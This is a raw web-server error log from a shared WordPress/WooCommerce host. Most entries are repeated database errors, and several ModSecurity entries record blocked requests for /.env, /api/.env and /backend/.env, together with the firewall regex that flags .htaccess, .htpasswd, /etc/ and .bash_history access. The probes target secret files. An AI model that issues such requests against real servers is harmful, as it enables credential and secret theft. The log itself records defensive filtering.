[Tue May 26 16:48:38.214809 2026] [lsapi:warn] [pid 817651:tid 817836] [client 45.13.225.123:36148] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Incorrect key file for table './srsglzts_wp57454/wp4i_options.MYI'; try to repair it for query SELECT option_name, option_value FROM wp4i_options WHERE option_name IN ('_transient_timeout_jetpack_autoloader_plugin_paths') made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\Jetpack\\Autoloader\\jp12ea33bcea6a641c43d24712adc9f0b6\\Shutdown_Handler->__invoke, Automattic\\Jetpack\\Autoloader\\jp12ea33bcea6a641c43d24712adc9f0b6\\Plugins_Handler->cache_plugins, set_transient, wp_prime_option_caches\n
[Tue May 26 16:48:38.214845 2026] [lsapi:warn] [pid 817651:tid 817836] [client 45.13.225.123:36148] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_timeout_woocommerce_blocks_asset_api_script_data_ssl', '1782386318', 'off') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\WooCommerce\\Blocks\\Assets\\Api->update_script_data_cache, set_transient, add_option\n
[Tue May 26 16:48:38.214865 2026] [lsapi:warn] [pid 817651:tid 817836] [client 45.13.225.123:36148] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_woocommerce_blocks_asset_api_script_data_ssl', '{\\"script_data\\":{\\"assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\",\\"version\\":\\"07c2f0675ddd247d2325\\",\\"dependencies\\":[\\"wp-hooks\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-types.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-types.js\\",\\"version\\":\\"bda84b1be3361607d04a\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\",\\"version\\":\\"ca04183222edaf8a26be\\",\\"dependencies\\":[\\"wp-api-fetch\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\",\\"version\\":\\"3b21c127321dcdffaeba\\",\\"dependencies\\":[\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-api-fetch\\",\\"wp-data\\",\\"wp-data-controls\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-notices\\",\\"wp-polyfill\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\",\\"version\\":\\"389607d443f2591c0913\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\",\\"version\\":\\"1c879273bd5c193cad0a\\",\\"dependencies\\":[\\"react\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\",\\"version\\":\\"00ce86264fca4977b16a\\",\\"dependencies\\":[\\"react\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-dom-ready\\",\\"wp-element\\",\\"wp-hooks\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\",\\"version\\":\\"6eb6865831aa5a75475d\\",\\"dependencies\\":[\\"react\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\",\\"version\\":\\"4f21a9f43ea5bfa7f02e\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-data-store\\",\\"wc-blocks-shared-context\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/price-format.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/price-format.js\\",\\"version\\":\\"eb7a7398126f71912b09\\",\\"dependencies\\":[\\"wc-settings\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\",\\"version\\":\\"cbe41c7abb3949767748\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\",\\"version\\":\\"5980872eb77817dd6b18\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-warning\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\",\\"version\\":\\"211abb6906805368a551\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-data-store\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\",\\"version\\":\\"8997b5406dcf18064a4e\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\",\\"version\\":\\"c33101c7e57ca780e0d8\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters.js\\",\\"version\\":\\"07254c2f32c26d21c0ef\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\",\\"version\\":\\"b7ae146ebe7863f9f6b8\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/all-products.js\\",\\"version\\":\\"de63136b925fe4405f95\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-blocks-shared-context\\",\\"wc-blocks-shared-hocs\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-api-fetch\\",\\"wp-autop\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-escape-html\\",\\"wp-hooks\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-style-engine\\",\\"wp-url\\",\\"wp-wordcount\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\
[Tue May 26 16:48:38.215302 2026] [security2:error] [pid 817651:tid 817836] [client 45.13.225.123:36148] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "armourin.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahWBjdlGRCPPN1dS2y26hQAAALw"]
[Tue May 26 16:48:38.350548 2026] [lsapi:warn] [pid 817651:tid 817817] [client 45.13.225.123:36162] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Incorrect key file for table './srsglzts_wp57454/wp4i_options.MYI'; try to repair it for query SELECT option_name, option_value FROM wp4i_options WHERE option_name IN ('_transient_timeout_jetpack_autoloader_plugin_paths') made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\Jetpack\\Autoloader\\jp12ea33bcea6a641c43d24712adc9f0b6\\Shutdown_Handler->__invoke, Automattic\\Jetpack\\Autoloader\\jp12ea33bcea6a641c43d24712adc9f0b6\\Plugins_Handler->cache_plugins, set_transient, wp_prime_option_caches\n
[Tue May 26 16:48:38.350576 2026] [lsapi:warn] [pid 817651:tid 817817] [client 45.13.225.123:36162] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_timeout_woocommerce_blocks_asset_api_script_data_ssl', '1782386318', 'off') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\WooCommerce\\Blocks\\Assets\\Api->update_script_data_cache, set_transient, add_option\n
[Tue May 26 16:48:38.350961 2026] [lsapi:warn] [pid 817651:tid 817817] [client 45.13.225.123:36162] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_woocommerce_blocks_asset_api_script_data_ssl', '{\\"script_data\\":{\\"assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\",\\"version\\":\\"07c2f0675ddd247d2325\\",\\"dependencies\\":[\\"wp-hooks\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-types.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-types.js\\",\\"version\\":\\"bda84b1be3361607d04a\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\",\\"version\\":\\"ca04183222edaf8a26be\\",\\"dependencies\\":[\\"wp-api-fetch\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\",\\"version\\":\\"3b21c127321dcdffaeba\\",\\"dependencies\\":[\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-api-fetch\\",\\"wp-data\\",\\"wp-data-controls\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-notices\\",\\"wp-polyfill\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\",\\"version\\":\\"389607d443f2591c0913\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\",\\"version\\":\\"1c879273bd5c193cad0a\\",\\"dependencies\\":[\\"react\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks.js\\",\\"version\\":\\"00ce86264fca4977b16a\\",\\"dependencies\\":[\\"react\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-dom-ready\\",\\"wp-element\\",\\"wp-hooks\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-context.js\\",\\"version\\":\\"6eb6865831aa5a75475d\\",\\"dependencies\\":[\\"react\\",\\"wp-element\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-shared-hocs.js\\",\\"version\\":\\"4f21a9f43ea5bfa7f02e\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-data-store\\",\\"wc-blocks-shared-context\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/price-format.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/price-format.js\\",\\"version\\":\\"eb7a7398126f71912b09\\",\\"dependencies\\":[\\"wc-settings\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors-frontend.js\\",\\"version\\":\\"cbe41c7abb3949767748\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-checkout.js\\",\\"version\\":\\"5980872eb77817dd6b18\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-warning\\"]},\\"assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/blocks-components.js\\",\\"version\\":\\"211abb6906805368a551\\",\\"dependencies\\":[\\"react\\",\\"react-dom\\",\\"wc-blocks-data-store\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-polyfill\\",\\"wp-primitives\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-dropdown.js\\",\\"version\\":\\"8997b5406dcf18064a4e\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-interactivity-checkbox-list.js\\",\\"version\\":\\"c33101c7e57ca780e0d8\\",\\"dependencies\\":[\\"wc-interactivity\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters.js\\",\\"version\\":\\"07254c2f32c26d21c0ef\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/active-filters-frontend.js\\",\\"version\\":\\"b7ae146ebe7863f9f6b8\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-data\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/all-products.js\\",\\"version\\":\\"de63136b925fe4405f95\\",\\"dependencies\\":[\\"react\\",\\"wc-blocks-components\\",\\"wc-blocks-data-store\\",\\"wc-blocks-registry\\",\\"wc-blocks-shared-context\\",\\"wc-blocks-shared-hocs\\",\\"wc-price-format\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-a11y\\",\\"wp-api-fetch\\",\\"wp-autop\\",\\"wp-block-editor\\",\\"wp-blocks\\",\\"wp-components\\",\\"wp-compose\\",\\"wp-data\\",\\"wp-element\\",\\"wp-escape-html\\",\\"wp-hooks\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-polyfill\\",\\"wp-primitives\\",\\"wp-style-engine\\",\\"wp-url\\",\\"wp-wordcount\\"]},\\"assets\\\\/client\\\\/blocks\\\\/all-products-frontend.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\
[Tue May 26 16:48:38.352158 2026] [security2:error] [pid 817651:tid 817817] [client 45.13.225.123:36162] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "armourin.srsglobalsoft.com"] [uri "/index.php"] [unique_id "ahWBjdlGRCPPN1dS2y26iAAAAKk"]
[Tue May 26 16:48:38.390158 2026] [security2:error] [pid 823496:tid 823647] [client 45.13.225.123:36226] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "armourin.srsglobalsoft.com"] [uri "/api/.env"] [unique_id "ahWBjpa08mrtyBNpA4PbLgAAABM"]
[Tue May 26 16:48:38.391935 2026] [security2:error] [pid 823496:tid 823697] [client 45.13.225.123:36212] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "armourin.srsglobalsoft.com"] [uri "/backend/.env"] [unique_id "ahWBjpa08mrtyBNpA4PbLwAAAEU"]
[Tue May 26 16:48:38.727928 2026] [security2:error] [pid 823496:tid 823628] [client 176.65.139.229:59738] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "rabbanitradingcompany.svijaykumar.in"] [uri "/.env"] [unique_id "ahWBjpa08mrtyBNpA4PbNAAAAAA"]
[Tue May 26 16:48:38.774553 2026] [lsapi:warn] [pid 823496:tid 823659] [client 45.13.225.123:36188] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_timeout_woocommerce_blocks_asset_api_script_data_ssl', '1782386318', 'off') ON DUPLICATE KEY UPDATE `option_name` = VALUES(`option_name`), `option_value` = VALUES(`option_value`), `autoload` = VALUES(`autoload`) made by shutdown_action_hook, do_action('shutdown'), WP_Hook->do_action, WP_Hook->apply_filters, Automattic\\WooCommerce\\Blocks\\Assets\\Api->update_script_data_cache, set_transient, add_option\n
[Tue May 26 16:48:38.775407 2026] [lsapi:warn] [pid 823496:tid 823659] [client 45.13.225.123:36188] [host armourin.srsglobalsoft.com] Backend log: WordPress database error Duplicate entry '34184' for key 'PRIMARY' for query INSERT INTO `wp4i_options` (`option_name`, `option_value`, `autoload`) VALUES ('_transient_woocommerce_blocks_asset_api_script_data_ssl', '{\\"script_data\\":{\\"assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-settings.js\\",\\"version\\":\\"07c2f0675ddd247d2325\\",\\"dependencies\\":[\\"wp-hooks\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-types.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-types.js\\",\\"version\\":\\"bda84b1be3361607d04a\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-middleware.js\\",\\"version\\":\\"ca04183222edaf8a26be\\",\\"dependencies\\":[\\"wp-api-fetch\\",\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-data.js\\",\\"version\\":\\"3b21c127321dcdffaeba\\",\\"dependencies\\":[\\"wc-blocks-registry\\",\\"wc-settings\\",\\"wc-types\\",\\"wp-api-fetch\\",\\"wp-data\\",\\"wp-data-controls\\",\\"wp-deprecated\\",\\"wp-element\\",\\"wp-html-entities\\",\\"wp-i18n\\",\\"wp-is-shallow-equal\\",\\"wp-notices\\",\\"wp-polyfill\\",\\"wp-url\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\\\\/plugins\\\\/woocommerce\\\\/assets\\\\/client\\\\/blocks\\\\/wc-blocks-vendors.js\\",\\"version\\":\\"389607d443f2591c0913\\",\\"dependencies\\":[\\"wp-polyfill\\"]},\\"assets\\\\/client\\\\/blocks\\\\/wc-blocks-registry.js\\":{\\"src\\":\\"https:\\\\/\\\\/armourin.com\\\\/wp-content\